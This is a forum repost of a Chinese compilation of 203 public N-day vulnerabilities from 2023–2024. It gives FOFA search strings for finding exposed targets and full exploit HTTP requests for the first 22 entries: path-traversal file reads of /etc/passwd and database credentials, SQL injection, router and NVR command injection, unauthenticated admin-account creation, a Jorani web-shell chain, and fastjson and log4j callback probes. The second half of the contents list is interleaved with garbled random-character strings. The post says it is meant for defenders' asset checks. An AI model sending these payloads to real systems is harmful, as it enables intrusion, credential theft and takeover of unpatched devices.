China Cyber Penetration Testing Alliance

Title: Public Internet Vulnerability Compilation 202309-202406 (repost)

Author: admin    Posted: 2024-6-5 14:31

Public Internet Vulnerability Compilation 202309-202406
道一安全 2024-06-05 07:41 Beijing
The following article originally appeared on 网络安全新视界 (author: 网络安全新视界).

Purpose: Exploitation of N-day vulnerabilities makes up a large share of real-world attack activity. This article is meant to help defenders; defensive teams can use its contents to run a risk check against their own assets.

Sources: The article covers 203 public, high-impact vulnerability POCs disclosed in China and abroad between September 2023 and May 2024. All of them were collected from other public accounts or websites and compiled for publication by the 网络安全新视界 team.

Patches: All of the vulnerabilities are already public. For patches or remediation guidance, contact the product vendor.

Content: Because of length limits, a few POCs that are too long have their payload replaced with the word PAYLOAD; search for the full POC yourself if you need it.

Legal: If any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account's backend and the content will be removed.

Statement

To keep things simple and easy to browse there is no "reply to get the full list": this article is the complete list as it stands. Search the page for a keyword to find an entry.

Bookmark this article if you need it. You can also follow the public account (网络安全新视界).

Contents
1. StarRocks MPP database unauthenticated access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor NGAF arbitrary file read
7. Hongyun (鸿运) active safety monitoring cloud platform arbitrary file download
8. Phicomm (斐讯) router RCE
9. Doccms (稻壳CMS) keyword unauthenticated SQL injection
10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. Hongfan (红帆) iOffice ioFileDown arbitrary file read
14. jshERP (华夏ERP) sensitive information disclosure
15. jshERP getAllList information disclosure
16. Hongfan HFOffice (医微云) SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT management platform arbitrary file read
21. Dahua ICC intelligent IoT management platform random remote code execution
22. Dahua ICC intelligent IoT management platform log4j remote code execution
23. Dahua ICC intelligent IoT management platform fastjson remote code execution
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. Yunshikong (云时空) social commerce ERP validateLoginName SQL injection
52. Weaver E-Office json_common.php SQL injection
53. DPTech VPN Service arbitrary file upload
54. Chanjet T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController / Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX dynamiccontent.properties.xhtml remote code execution
60. Byzoro (百卓) Smart management platform importexport.php SQL injection
61. ZJU Enter (浙大恩特) customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. Jiecheng (捷诚) management information system CWSFinanceCommon SQL injection
65. Youkate (优卡特) face-recognition smart management platform 1.0.55.0.0.1 authorization bypass
66. Wanhu ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
70. Wanhu ezEIP success command execution
71. Bangyong (邦永) PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. Newcapec (新开普) campus service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE (百为) flow-control router remote command execution
80. Suda Tianyao (速达天耀) DesignReportSave.jsp arbitrary file upload
81. Uniview (宇视) video surveillance main-cgi password disclosure
82. Sifudi (思福迪) LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Tosei (Japan) self-service laundry machine RCE
87. DBAppSecurity (安恒) Mingyu security gateway aaa_local_web_preview file upload
88. DBAppSecurity Mingyu security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon FE collaborative office platform editflow_manager SQL injection
90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. QiAnXin SecGate 3600 firewall app_av_import_save arbitrary file upload
94. QiAnXin SecGate 3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
# e& C7 C& _9 Q) Q101. ivanti policy secure-22.6命令注入* j5 @7 Z! _1 }) ^+ r3 \% r' l
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
# n' x$ i: ]: N4 }: t/ Y: c2 X103. Ivanti Pulse Connect Secure VPN XXE
% U& D3 o( S5 g7 u104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露: _% o. I- q( {, g! M: ?
105. SpringBlade v3.2.0 export-user SQL 注入# L' \' g/ L6 z
106. SpringBlade dict-biz/list SQL 注入
9 [( r8 L* ^3 y7 Q% X107. SpringBlade tenant/list SQL 注入
6 H- }+ `1 b$ }+ ^; V) E( J108. D-Tale 3.9.0 SSRF5 ~! I; R# u* n3 v6 H$ u* x
109. Jenkins CLI 任意文件读取
: P- j$ R* m2 g2 Y& M0 Q, A. b110. Goanywhere MFT 未授权创建管理员, V- Y: ]: K* c2 m, `+ K- n1 X
111. WordPress Plugin HTML5 Video Player SQL注入
( v- {$ |6 B) g  U3 i0 \9 T7 b112. WordPress Plugin NotificationX SQL 注入3 u2 A* O- o) y4 A( _; F# O. z
113. WordPress Automatic 插件任意文件下载和SSRF
+ }2 |! W% @1 G# \0 Y4 j6 E& T/ d114. WordPress MasterStudy LMS插件 SQL注入
$ l; w+ y% n2 K/ d2 ?) [115. WordPress Bricks Builder <= 1.9.6 RCE- S8 v/ [. m+ F1 s4 T2 q1 w: q
116. wordpress js-support-ticket文件上传
+ N6 t9 H; C* v" x8 @% j117. WordPress LayerSlider插件SQL注入
5 x% @2 B! e# t7 S, N( b( l118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
2 ~, @) V3 T8 p% h119. 北京百绰智能S20后台sysmanageajax.php sql注入
' J, r# n0 r3 Y; y& J6 l120. 北京百绰智能S40管理平台导入web.php任意文件上传2 G  l1 ~  E8 ]5 r7 Z- p
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
  k" f3 b; T8 J" f; B; p# p' |122. 北京百绰智能s200管理平台/importexport.php sql注入
! s$ `6 l4 d( z/ n' G& j123. Atlassian Confluence 模板注入代码执行
2 R4 Z( @; K& u! X! A& ]8 M8 F124. 湖南建研工程质量检测系统任意文件上传
8 \; p% F8 ~5 ?1 n) g' i125. ConnectWise ScreenConnect身份验证绕过; s3 N, F( z+ N3 i6 x
126. Aiohttp 路径遍历" U  l* _  e- ~, C6 ]0 ^/ q
127. 广联达Linkworks DataExchange.ashx XXE+ c1 _+ G. k/ J
128. Adobe ColdFusion 反序列化
8 @) X# H+ E# |0 N% o8 O! y129. Adobe ColdFusion 任意文件读取
0 H6 h  Z7 W- h' m130. Laykefu客服系统任意文件上传
# A, F- j' o+ q+ d$ n131. Mini-Tmall <=20231017 SQL注入. {5 O8 B% z7 i+ D
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过' D9 D7 e( N; S' g0 U$ G* z3 `
133. H5 云商城 file.php 文件上传
  B2 V0 b! u2 ?* \& Q134. 网康NS-ASG应用安全网关index.php sql注入0 @4 C" P6 ?& w0 f4 m0 v
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
) P, E! }2 |2 T% R136. NextChat cors SSRF
' r. j* O4 I' {' o! m9 E  W137. 福建科立迅通信指挥调度平台down_file.php sql注入
9 h& K- J" U  u3 ^138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
4 {7 q4 o' l+ l, }9 K: ~139. 福建科立讯通信指挥调度平台editemedia.php sql注入
) O0 W; @* j" w* e140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入- b8 e* D+ ^' N. x
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
0 r% {7 D2 l* s2 B( D4 `6 f/ t142. CMSV6车辆监控平台系统中存在弱密码
0 R4 H* }: |7 O: ~! b143. Netis WF2780 v2.1.40144 远程命令执行
9 L. M9 C+ d% }! M% S0 S  D7 W144. D-Link nas_sharing.cgi 命令注入
+ L: x9 A5 c4 d: P145. Palo Alto Networks PAN-OS GlobalProtect 命令注入, {/ `; j. Y- R" Z6 y
146. MajorDoMo thumb.php 未授权远程代码执行
+ P2 _- y0 l2 R, ?9 Y8 n3 j147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
  v) J9 E3 k8 Y! e148. CrushFTP 认证绕过模板注入
/ ^: I2 _5 K# I# Z; L# T5 D149. AJ-Report开源数据大屏存在远程命令执行, P9 X) h  @. e
150. AJ-Report 1.4.0 认证绕过与远程代码执行( i$ P0 M& C: E7 j
151. AJ-Report 1.4.1 pageList sql注入% ~) p; @1 k9 t: l/ j" s% @0 ]
152. Progress Kemp LoadMaster 远程命令执行1 |0 g! b+ \0 a( i+ g0 ?
153. gradio任意文件读取
# P- |% p! m9 }+ c0 @154. 天维尔消防救援作战调度平台 SQL注入# ^7 ]  _1 v/ g9 g, K
155. 六零导航页 file.php 任意文件上传, S' e" u5 w3 ?
156. TBK DVR-4104/DVR-4216 操作系统命令注入
5 J  y  X  _0 C  V3 k* S157. 美特CRM upload.jsp 任意文件上传
/ Y, g. b. K! E# c158. Mura-CMS-processAsyncObject存在SQL注入5 Y3 {% I2 O. D' f# B
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传* S! \: Z& s% `" S$ j  U% u
160. Sonatype Nexus Repository 3目录遍历与文件读取/ t5 z* @+ C8 ?1 E$ @
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
$ G! P5 ]6 M$ ^5 C$ G162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
2 W6 P( }8 J' F# J" ?163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
9 j9 T5 o7 ?' r& Q( {3 O164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传$ r' n; S2 [6 s4 T( w6 D2 k
165. OrangeHRM 3.3.3 SQL 注入
' t5 ]- s" k  G5 ~& e& c8 E/ v166. 中成科信票务管理平台SeatMapHandler SQL注入' d/ n2 y- c& _  n, [9 P% X
167. 精益价值管理系统 DownLoad.aspx任意文件读取& X; q! ]* K, B" Y' z! d
168. 宏景EHR OutputCode 任意文件读取1 P0 T% Z% f$ p  W6 k  p
169. 宏景EHR downlawbase SQL注入
. \+ h( X7 `8 E* g- I170. 宏景EHR DisplayExcelCustomReport 任意文件读取1 h1 ~0 |0 O( P+ V. E1 M0 ?
171. 通天星CMSV6车载定位监控平台 SQL注入, g6 D4 A; L' H% D( S1 e( {
172. DT-高清车牌识别摄像机任意文件读取( d% n1 g! ]* E' r  E% y! z
173. Check Point 安全网关任意文件读取3 t9 O0 [  s) n8 ~& V* A
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
( _/ R0 T/ J6 H9 D* @1 U175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
, }1 @: K- Y  G3 Q3 z* k8 f176. 电信网关配置管理系统 rewrite.php 文件上传& ^/ g0 ?& G" G" g3 C8 J
177. H3C路由器敏感信息泄露3 p# G% `" A) ~/ J
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
2 ?8 R6 Q/ w0 a8 }179. 建文工程管理系统存在任意文件读取# d9 t0 p8 S( |5 L1 E" M6 H; F1 P1 L
180. 帮管客 CRM jiliyu SQL注入
! x& {% D. C6 G4 \181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
& W7 \0 I- s, s& D9 Z2 k) ?; ^182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建# l, a8 k9 p6 W
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
( z; I# l7 m! {/ ?+ {% u184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
$ Y0 V6 w# e  c+ l185. 瑞友天翼应用虚拟化系统SQL注入
8 D( Z  ?7 M! l( U! i" {) S* g186. F-logic DataCube3 SQL注入1 y+ |8 b  o0 v1 M# F6 H- S
187. Mura CMS processAsyncObject SQL注入# h! a! h6 j2 R0 k" o; Z
188. 叁体-佳会视频会议 attachment 任意文件读取
7 |$ @  W4 B6 R) s9 }* r& ^8 S& |6 O) z189. 蓝网科技临床浏览系统 deleteStudy SQL注入
1 `4 x, i! }  Y8 M( Z) H6 n190. 短视频矩阵营销系统 poihuoqu 任意文件读取
1 s$ U8 M+ o4 M# ^191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入5 A6 y' X/ F' F# z1 l
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
& R+ ]2 E4 r+ I' W, d9 ]193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
2 a$ i0 W1 G& Y3 B194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
3 _: ]3 N* ]4 t. m' N195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
  @. ^. o$ L0 m0 `5 M9 ]! f$ M196. 河南省风速科技统一认证平台密码重置
7 x9 A: O2 p+ n! Q, W; s# W197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入% p& w- }8 r' M, v$ U
198.  阿里云盘 WebDAV 命令注入
2 }0 x: A9 M; ]" B* J2 h199. cockpit系统assetsmanager_upload接口 文件上传9 b4 _. Z: c) e, L+ i# c
200. SeaCMS海洋影视管理系统dmku SQL注入
4 }# }% ?1 u# L201. 方正全媒体新闻采编系统 binary SQL注入
' r: c- w9 q/ K3 A7 A$ l7 H% D202. 微擎系统 AccountEdit任意文件上传
' Q3 l# x; P: T5 P- |# R203. 红海云EHR PtFjk 文件上传* t) W  c1 E, p0 s8 L) h0 z" x1 i

POC list

1. StarRocks MPP database unauthenticated access
FOFA: title="StarRocks"

An unauthenticated request to the memory-tracker page of the StarRocks HTTP service:

GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA: title="Casdoor"

Path traversal through the static file handler; the response returns the contents of /etc/passwd.

GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"

GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Set password to the MD5 hash of the password you want for the new account (the value below is an MD5 hash, not a plaintext password).

POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"

Command injection through the log parameter; the response contains the output of whoami.

GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. Sangfor NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"

Note the /etc/./passwd form of the path, which the POC uses to get past a naive filter on the file parameter.

GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host: x.x.x.x

7. Hongyun (鸿运) active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"

The example path downloads the application's JDBC configuration, which holds the database credentials.

GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host: x.x.x.x

8. Phicomm (斐讯) router RCE
FOFA: icon_hash="-1344736688"

Log in to the admin interface with the default admin account first, then send the request below. The stok value in the URL and the sysauth cookie both come from that login session, and the command is injected through the wifiRebootrange field.

POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login in step one>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. Doccms (稻壳CMS) keyword unauthenticated SQL injection
FOFA: app="Doccms"

GET /search/index.php?keyword=PAYLOAD HTTP/1.1
Host: x.x.x.x

PAYLOAD is the double URL-encoding of the following statement (error-based; the result of user() is returned inside the XPath error message):

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

The response to the upload contains the path of the uploaded file.

POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"

Error-based injection in the recordid parameter; the comparison 1=@@version forces a conversion error whose message contains the SQL Server version string.

GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"

Step one: request the login page to obtain the session cookies.

GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value set in the response is reused, together with jorani_session, in the following requests:

HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

Step two: POST the login form. The login value is a PHP stub that runs system() on the base64-decoded value of the K1SYJPMHLU4Z request header; the failed login is recorded in the application's log file for the day, and the language parameter is a path traversal into application/logs, so the view requested in step three resolves to that log file.

POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Step three: request the log page for that day with the command in the header. The header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64 encoding of echo ---------;id 2>&1;echo ---------; so the response contains the output of id between the two separator lines. The log file name (log-2023-10-24) follows the date of the request.

GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. Hongfan (红帆) iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"

GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. jshERP (华夏ERP) sensitive information disclosure
FOFA: body="jshERP-boot"

The disclosed data includes usernames and passwords. The ;.ico suffix is a path parameter: the authentication filter treats the request as a static .ico resource while Spring's path matching still routes it to getAllList.

GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. jshERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"

The disclosed data includes usernames and passwords. This is a second way of reaching the same endpoint as entry 14: the a.ico/../ segment satisfies the static-resource check and is normalised away before routing.

GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. Hongfan HFOffice (医微云) SQL injection
FOFA: title="HFOffice"

The POC injects into the sorts parameter and makes SQL Server compute the MD5 of 1234 with HASHBYTES. Subtracting the hex string from 1 forces a conversion error, so the digest (81DC9BDB52D04DC20036DBD8313ED055) shows up in the response.

GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. Dahua DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"

Error-based injection through the netMarkings element of the deleteBulletin SOAP operation; the md5 value is returned inside the XPath error message.

POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"

GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"

Error-based injection in bean.RecId; the result of user() is returned in the XPath error message.

GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. Dahua ICC intelligent IoT management platform arbitrary file read
FOFA: body="*客户端会小于800*"

The fileUrl parameter accepts a file: URL, so the response returns the contents of /etc/passwd.

GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. Dahua ICC intelligent IoT management platform random remote code execution
FOFA: icon_hash="-1935899595"

The body is the standard fastjson DNS-callback probe (java.net.URL inside a JSONObject; the trailing "" is deliberate). A DNS query arriving at the dnslog domain confirms that the endpoint parses the JSON with fastjson; it does not by itself execute code.

POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
   "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}

22. Dahua ICC intelligent IoT management platform log4j remote code execution
FOFA: icon_hash="-1935899595"

The loginName value is a log4j JNDI lookup; a DNS query for the dnslog domain confirms the lookup is being evaluated.

POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
